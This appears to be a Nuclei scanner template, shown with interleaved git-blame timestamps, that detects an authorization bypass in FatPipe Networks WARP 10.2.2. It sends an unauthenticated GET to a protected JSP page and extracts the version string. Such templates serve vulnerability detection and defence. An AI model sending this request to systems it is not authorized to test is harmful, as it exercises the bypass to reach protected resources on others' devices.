2021-09-30 11:48:21 +00:00
id : fatpipe-auth-bypass
2021-09-30 02:07:24 +00:00
info :
name : FatPipe Networks WARP 10.2.2 Authorization Bypass
author : gy741
severity : high
2022-04-22 10:38:41 +00:00
description : Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources
behind protected pages.
2021-09-30 02:07:24 +00:00
reference :
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
2021-09-30 11:48:21 +00:00
- https://www.fatpipeinc.com/support/advisories.php
2021-09-30 02:07:24 +00:00
tags : fatpipe,auth-bypass,router
requests :
- raw :
- |
GET /fpui/jsp/index.jsp HTTP/1.1
Host : {{Hostname}}
Accept : */*
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "productType"
- "type:"
- "version:"
2021-09-30 11:48:21 +00:00
- "<title>FatPipe Networks</title>"
2021-09-30 02:07:24 +00:00
condition : and
2021-09-30 11:48:21 +00:00
extractors :
- type : regex
part : body
regex :
- 'version : "([0-9.a-z]+)" '